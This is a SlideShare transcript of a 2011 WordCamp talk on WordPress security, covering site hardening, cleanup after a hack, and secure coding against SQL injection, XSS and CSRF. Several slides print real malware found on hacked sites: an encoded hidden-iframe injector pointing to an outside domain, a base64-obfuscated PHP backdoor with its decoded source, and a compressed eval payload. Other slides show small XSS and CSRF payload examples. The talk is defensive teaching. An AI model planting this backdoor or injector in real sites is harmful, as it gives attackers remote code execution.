WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011

15,461 views

Published on

The 'WordPress Security: Be a Superhero' presentation at WordCamp Raleigh May 2011.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
15,461
On SlideShare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
19
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011

  1. 1. Security: Be aSuperhero http://johnford.is/ @iamjohnford
  2. 2. http://automattic.com/
  3. 3. http://vaultpress.com/
  4. 4. Superhero Training
  5. 5. Why aresuperheroes needed?
  6. 6. Know Your Enemy
  7. 7. Ninjas?
  8. 8. http://flic.kr/p/8gKpiG
  9. 9. http://flic.kr/p/5AU3Lp
  10. 10. SmokingAsthmatic Clowns
  11. 11. S.A.C.s
  12. 12. What doS.A.C.s do?
  13. 13. document.write(unescape(%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%6C%34%63%6B%73%74%34%72%2E%63%6E%2F%62%6C%6F%67%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%37%27%20%77%69%64%74%68%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E));
  14. 14. <iframe src=http://bl4ckst4r.cn/blog/go.php?sid=17 width=0 height=0></iframe>
  15. 15. <?php eval(base64_decode("Pz48P3BocA0KJGRlbGltID0gIiAgICAgIjsgZWNobyAkZGVsaW07IGVycm9yX3JlcG9ydGluZyhFX0FMTCk7IGlmKCFlbXB0eSgkX1BPU1RbJ2RhdGEnXSkpIHsgJHBvc3RbJ2RhdGEnXSA9ICRfUE9TVFsnZGF0YSddOyBpZighZW1wdHkoJF9QT1NUWyd1cmwnXSkpIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyd1cmwnXSk7ICR1cmxzX2FycmF5ID0gdW5zZXJpYWxpemUoJHRtcCk7ICR1cmwgPSBhcnJheV9zaGlmdCgkdXJsc19hcnJheSk7IGlmKCFlbXB0eSgkdXJsc19hcnJheSkgQU5EIGNvdW50KCR1cmxzX2FycmF5KT4wKSB7ICR0bXAgPSBzZXJpYWxpemUoJHVybHNfYXJyYXkpOyAkcG9zdFsndXJsJ10gPSBiYXNlNjRfZW5jb2RlKCR0bXApOyB9ICR0bXAgPSBwYXJzZV91cmwoJHVybCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBlY2hvICJ0cnlpbmcgdG8gdXBkYXRlIGZpbGVbICIuJHRtcFsncGF0aCddLiIgXSB2aWEgRlRQXG4iOyAkZmlsZSA9ICd0bXAucGhwJzsgJGNvbnRlbnQgPSB1bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCRwb3N0WydkYXRhJ10pKTsgJGNvbnRlbnQgPSBiYXNlNjRfZGVjb2RlKCRjb250ZW50Wydjb250ZW50J10pOyAkZnAgPSBmb3BlbigkZmlsZSwgJ3cnKTsgZndyaXRlKCRmcCwgJGNvbnRlbnQpOyBmY2xvc2UoJGZwKTsgY2htb2QoJGZpbGUsIDA3NzcpOyAkZnAgPSBmb3BlbigkZmlsZSwncicpOyAkcG9zdCA9IGZhbHNlOyB9IGVsc2UgeyBlY2hvICJTZW5kaW5nIHJlcXVlc3QgdG86ICR1cmwgXG4iOyAkZnAgPSBmYWxzZTsgfSAkY29udGVudCA9IHJlcXVlc3QoJHVybCwgJHBvc3QsICRmcCk7IGlmKCR0bXBbJ3NjaGVtZSddPT0iZnRwIikgeyBmY2xvc2UoJGZwKTsgdW5saW5rKCRmaWxlKTsgfSBpZigkdG1wWydzY2hlbWUnXT09ImZ0cCIgQU5EICRjb250ZW50IT09ZmFsc2UpIGVjaG8gIkZUUDogVVBEQVRFRFxuIjsgZWxzZSBlY2hvICRkZWxpbS4kY29udGVudDsgfSBlbHNlIHsgJHRtcCA9IGJhc2U2NF9kZWNvZGUoJHBvc3RbJ2RhdGEnXSk7ICRkYXRhID0gdW5zZXJpYWxpemUoJHRtcCk7IGlmKGVtcHR5KCRkYXRhKSBPUiAhaXNfYXJyYXkoJGRhdGEpKSB7IGV4aXQoIlNvbWUgZXJyb3Igd2hpbGUgc2F2aW5nOyIpOyB9IGZvcmVhY2ggKCRkYXRhIEFTICRkKSB7IGlmKGRpcm5hbWUoJGRbJ24nXSkhPScuJyBhbmQgIWZpbGVfZXhpc3RzKGRpcm5hbWUoJGRbJ24nXSkpKSB7IG1rZGlyKGRpcm5hbWUoJGRbJ24nXSksIDA3NzcpOyBjaG1vZChkaXJuYW1lKCRkWyduJ10pLCAwNzc3KTsgfSBpZigkZFsnbiddPT0nZXYnKSB7IGV2YWwoJGRbJ2MnXSk7IGNvbnRpbnVlOyB9ICRmID0gZm9wZW4oJGRbJ24nXSwgJ3cnKTsgJGJ5dGVzX3dyaXR0ZW4gPSBmd3JpdGUoJGYsICRkWydjJ10pOyBmY2xvc2UoJGYpOyBpZihmaWxlc2l6ZSgkZFsnbiddKT4xMCkgeyBlY2hvICJmaWxlOiIuJGRbJ24nXS4iOiBzYXZlZFxuIjsgfSBlbHNlIHsgZWNobyAic29tZSBlcnJvciBoYXBwZW5zOiAiLiRkWyduJ10uIiBzaXplIGlzOiAiLmZpbGVzaXplKCRkWyduJ10pLiIgYnl0ZXNcbiI7IH0gaWYoIUBjaG1vZCgkZFsnbiddLCAwNzc3KSkgeyBlY2hvICJzb21lIGVycm9yIHdpdGg6ICIuJGRbJ24nXS4iXG4iOyB9IH0gfSB9IGVsc2UgeyBkaWUoIk5PIERBVEEiKTsgfSBmdW5j
  16. 16. <?php$delim = " "; echo $delim; error_reporting(E_ALL); if(!empty($_POST[data])){ $post[data] = $_POST[data]; if(!empty($_POST[url])) { $tmp = base64_decode($_POST[url]); $urls_array = unserialize($tmp); $url = array_shift($urls_array);if(!empty($urls_array) AND count($urls_array)>0) { $tmp = serialize($urls_array);$post[url] = base64_encode($tmp); } $tmp = parse_url($url); if($tmp[scheme]=="ftp") { echo "trying to update file[ ".$tmp[path]." ] via FTPn"; $file =tmp.php; $content = unserialize(base64_decode($post[data])); $content =base64_decode($content[content]); $fp = fopen($file, w); fwrite($fp,$content); fclose($fp); chmod($file, 0777); $fp = fopen($file,r); $post =false; } else { echo "Sending request to: $url n"; $fp = false; } $content =request($url, $post, $fp); if($tmp[scheme]=="ftp") { fclose($fp); unlink($file); } if($tmp[scheme]=="ftp" AND $content!==false) echo "FTP: UPDATEDn";else echo $delim.$content; } else { $tmp = base64_decode($post[data]); $data =unserialize($tmp); if(empty($data) OR !is_array($data)) { exit("Some error whilesaving;"); } foreach ($data AS $d) { if(dirname($d[n])!=. and !file_exists(dirname($d[n]))) { mkdir(dirname($d[n]), 0777); chmod(dirname($d[n]),0777); } if($d[n]==ev) { eval($d[c]); continue; } $f = fopen($d[n], w);$bytes_written = fwrite($f, $d[c]); fclose($f); if(filesize($d[n])>10) { echo"file:".$d[n].": savedn"; } else { echo "some error happens: ".$d[n]." sizeis: ".filesize($d[n])." bytesn"; } if(!@chmod($d[n], 0777)) { echo "someerror with: ".$d[n]."n"; } } } } else { die("NO DATA"); } function request($url, $post=false, $fp=false, $timeout=150){ $ch = curl_init(); if($post) { $post= is_array($post)?http_build_query($post):$post; curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } if($fp) { curl_setopt($ch,CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); fclose($fp); }curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($ch); $error =curl_error($ch); if($error) { echo "CURL_ERROR: ".$error."n"; return false; }
  17. 17. /* WARNING: This file isprotected by copyrightlaw. To reverse engineeror decode this file isstrictly prohibited. */
  18. 18. SuperheroChecklist
  19. 19. Use StrongPasswords
  20. 20. I saw John Ford speak atWordCamp Raleigh 2011IsJFs@WCR2k11
  21. 21. I saw the awesome, loving, generous, compassionate, handsome, courteous,thoughtful, modest John Ford speak at WordCamp Raleigh 2011IstalgchctmJFs@WCR2k11
  22. 22. KeepWordPress Updated
  23. 23. KeepThemes & Plugins Updated
  24. 24. eval(gzuncompress(base64_decode(eJzcvdtyHMmSIPYOs/6H7Jo+XcCZQt2vBEEuCALdnOZNAMiesyQHlpUZVZVEVmadzCyA4PQxW0kmjcxkMj2tnvaxz2pMkmnHZKa10YN2fqX/QL8gv0RERmRmASC7e6Ztjp0mKuPi4eHh4eER4eEezLZnQSjOxYcgzdJtP0gidym2z8+Pnzw9Oj/fcZpOvSX8IJuusyyOmqvFqr6z4/ytE0ReuPaFs10v5u45f3ICALuOvCyIIwW6Pv/oxctVItK0vuN8/bVTUQBSdBFoZMv56vVM+O1u39l3smQtEPRXrycT0XN7kPT81dOne5AwHHvDiQcJbfzqjYbD9sTIbo/GYuYaCZ7w3WFHJWxBlU5XjLpGiU67782GkFA7iObpeulG9dQ5S9woDd0sTpyX4XoeRM7LJK5hcb8zGbaxBTdJ3Ovt2nGQpFmt4dROhRdHPv46WwQJ/TiO10m2oF/BDH7s7G0pSjjHXXcya7e3kcBfvZ6KniA061+diMt7zqjfd76qY3vTXnswQ6Kk62maJduqbMMZ7ux94SQiWyeR0x12nb+Egcou3XA7L0l1G0674UBCKCKdtuPsOt0dwAeJ7A4Go8kYmhi2mar9cbuDVO0N6HviTgYdzK93221CatYe93tTSOl0nd87PVmvP5sNuwJTzcR2u91D8uqSMAiz4Xg6ohaGA4LndrwZjmr9/iyOMicNPor9Wr/mzFwPfhwkgRs2nG9FeCmywHOhOzA8u6lIglntwf1p0npwthDOyp0L5zpeA1H+uBZpJnzHi9ehH72tZ85UAFvxoEK6mznZIkidLFiKJgyxcFPMv3bcuQuDjYWSpnMaJ5A0AybIADxMgzi6FFEgIi+vlAjXZ1huAriFAih733UWiZjt1xZZtrrXak3DeN7M3ASAR24T+L4VRL74gHOo5SbeIrgUrTWkACe5kR9E891M89+uSBL4F/vWwr4+MFjzCLPS+63pg/st90GDMPVF5gYhYBP5jviwCqFF5LcmUYn+2XIeB8I5FUEmGo4PP/21cykSKDnPgGoN5+L/+6f/N4oy4USBt8iwSLp0QwdSp4CiyD5mzpVIfBE1nUdBBuVeQ/LaWzhXgYBOOOkKihIBAdd1EsydGSQk1NaryI0isViGAPoCULDweuo6WBWmm+vACDppDMWCzE0Rl9gBaq9iP4ESLo6lv/aCxBGRg0MNIymWqxiGBWgwcy/
  25. 25. Correct FilePermissions
  26. 26. // ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(DB_NAME, wordcamp);/** MySQL database username */define(DB_USER, wordcamp);/** MySQL database password */define(DB_PASSWORD, 3^?wb6mhqsiyk^ABHR6y);/** MySQL hostname */define(DB_HOST, mysql.myserver.com);/** Database Charset to use in creating database tables. */define(DB_CHARSET, utf8);/** The Database Collate type. Dont change this if in doubt. */define(DB_COLLATE, );
  27. 27. /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will forceall users to have to log in again. * * @since 2.6.0 */define(AUTH_KEY, 2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y);define(SECURE_AUTH_KEY, *E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q));define(LOGGED_IN_KEY, &psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=);define(NONCE_KEY, x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4});define(AUTH_SALT, eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi);define(SECURE_AUTH_SALT, /a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65);define(LOGGED_IN_SALT, IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-);define(NONCE_SALT, hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W);
  28. 28. http://wiki.mediatemple.net/w/File_Permissions
  29. 29. http://wiki.mediatemple.net/w/File_Permissions
  30. 30. Maybe beObscure
  31. 31. Multiplesites on thesame server
  32. 32. What if you need tocome to the rescue?
  33. 33. Contact the web host
  34. 34. Back up the exploited site
  35. 35. Change allpasswords and keys
  36. 36. // ** MySQL settings - You can get this info from your web host ** ///** The name of the database for WordPress */define(DB_NAME, wordcamp);/** MySQL database username */define(DB_USER, wordcamp);/** MySQL database password */define(DB_PASSWORD, 3^?wb6mhqsiyk^ABHR6y);/** MySQL hostname */define(DB_HOST, mysql.myserver.com);/** Database Charset to use in creating database tables. */define(DB_CHARSET, utf8);/** The Database Collate type. Dont change this if in doubt. */define(DB_COLLATE, );
  37. 37. /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will forceall users to have to log in again. * * @since 2.6.0 */define(AUTH_KEY, 2FO}Z*-a#4E9Ft5$kBzZ_kk|Z3@zR+fRV`{$axu|r}(dE-Akbziu #-BLmd%qV-y);define(SECURE_AUTH_KEY, *E~-xU9xLhB[iv|8fUi7[{?=KS;E 0Cq#!NP, &]/oQwc1EkkR4A(c:x76f/w]Q));define(LOGGED_IN_KEY, &psh-W)gE_~qK$kL{qT~2(XPyT<FAc}!=&{(SL!.?y9ObiYgNmdqohdH<t5/KO4=);define(NONCE_KEY, x&Im0c}brod3Cl%;jWJub<liaf:rFV#67F-E*o&$r90I/LSLP8Nz`Gb!R*H:J;4});define(AUTH_SALT, eO7i!tPIz[@dq.[mY`5zPu4x_b`K^6NTPK:%JwZdGCoo||)O}6aZ7>Y jb84mlxi);define(SECURE_AUTH_SALT, /a60,@Uf]/S$xHHQ]Dq/xB:zx^#%0<w#vPv|9go@y#c|*PW# bKE]|S&#-JJ}F65);define(LOGGED_IN_SALT, IEP|]D`QVwDSg*t|[V>Jy]I^H~Q rfou+^wkV?FDbBO%fpg-(WH~v]7!_3M|&m(-);define(NONCE_SALT, hnrbdh|-~=%>qC7Cbl33$=J~!F}SS*(*Fkl,uh8=7+u(b45|WtKe%S32r]3X~k/W);
  38. 38. Check FilePermissions
  39. 39. RemoveRogue Code
  40. 40. http://wordpress.org/extend/plugins/exploit-scanner/
  41. 41. Subversion http://codex.wordpress.org/Installing/Updating_WordPress_with_Subversion
  42. 42. machine:www user$ svn status? wp-config.php? .htaccessX index.php? wp-content/cacheX wp-content/plugins/akismetM wp-content/themes/twentyten/404.php? wp-admin/metaPerforming status on external item at wp-content/plugins/akismet
  43. 43. machine:www user$ svn diff wp-content/themes/twentyten/404.phpIndex: wp-content/themes/twentyten/404.php===================================================================--- wp-content/themes/twentyten/404.php (revision 15819)+++ wp-content/themes/twentyten/404.php (working copy)@@ -1,3 +1,5 @@+<?php echo "<h1>Heres some code that really shouldnt be here</h1>"; ?>+ <?php /** * The template for displaying 404 pages (Not Found).
  44. 44. Restore FromBackup
  45. 45. YOU HAZ BACKUP, RIGHT?http://flic.kr/p/DC3Q
  46. 46. SuperheroDeveloperChecklist
  47. 47. SQLInjection
  48. 48. $wpdb->query( "UPDATE $wpdb->posts SET post_title = $new_title WHERE ID = $id"); BAD
  49. 49. $new_title = "SACed -- ";$wpdb->query( "UPDATE $wpdb->posts SET post_title = $new_title WHERE ID = $id"); BAD
  50. 50. $new_title = "SACed -- ";$wpdb->query( "UPDATE $wpdb->posts SET post_title = SACed -- $new_title WHERE ID = $id"); BAD
  51. 51. $wpdb->update() GOOD
  52. 52. $wpdb->update( $wpdb->posts, array( post_title => $new_title ), array( ID => $id )); GOOD
  53. 53. $wpdb->insert( $table, $data ); GOOD
  54. 54. $wpdb->prepare() GOOD
  55. 55. $wpdb->prepare( "SELECT * FROM $wpdb->posts WHERE post_name = %s OR ID = %d", $some_name, $some_id); GOOD
  56. 56. XSSCross-siteScripting
  57. 57. <h1> <?php echo $title; ?></h1> BAD
  58. 58. $title = <script>jsCode();</script>;<h1> <?php echo $title; ?></h1> BAD
  59. 59. <h1> <?php echo esc_html( $title ); ?></h1> GOOD
  60. 60. <a href="#wordcamp" title="<?php echo $title; ?>"> Link Text</a> BAD
  61. 61. <?php $title = " onmouseover="jsCode();; ?><a href="#wordcamp" title="<?php echo $title; ?>"> Link Text</a> BAD
  62. 62. <a href="#wordcamp" title="<?php echo esc_attr( $title ); ?>"> Link Text</a> GOOD
  63. 63. esc_textarea() GOOD
  64. 64. <a href="<?php echo $url; ?>"> Link Text</a> BAD
  65. 65. <?php $url = javascript:jsCode();; ?><a href="<?php echo $url; ?>"> Link Text</a> BAD
  66. 66. <a href="<?php echo esc_url( $url ); ?>"> Link Text</a> GOOD
  67. 67. <script> var foo = <?php echo $unsafe; ?>;</script> BAD
  68. 68. <script> var foo = <?php echo esc_js( $unsafe ); ?>;</script> GOOD
  69. 69. wp_filter_kses( $data ) GOOD
  70. 70. CSRFCross-site Request Forgery
  71. 71. http://mysite.com/delete-record.php?id=1
  72. 72. <img src="http://mysite.com/delete-record.php?id=1" />
  73. 73. Noncesaction-, object-, & user-specific time-limited secret keys
  74. 74. wp_nonce_field( plugin-action_object ) GOOD
  75. 75. check_admin_referer( plugin-action_object ) GOOD
  76. 76. current_user_can( edit_posts ) GOOD
  77. 77. Resourceshttp://codex.wordpress.org/Changing_File_Permissionshttp://codex.wordpress.org/Hardening_WordPresshttp://codex.wordpress.org/Installing/Updating_WordPress_with_Subversionhttp://codex.wordpress.org/FAQ_My_site_was_hackedhttp://wordpress.org/extend/plugins/exploit-scanner/http://codex.wordpress.org/Function_Reference/wpdb_Classhttp://codex.wordpress.org/Data_Validationhttp://codex.wordpress.org/WordPress_Nonces
  78. 78. http://flic.kr/p/5AU3Lp
  79. 79. Thank you! http://johnford.is/ @iamjohnford

×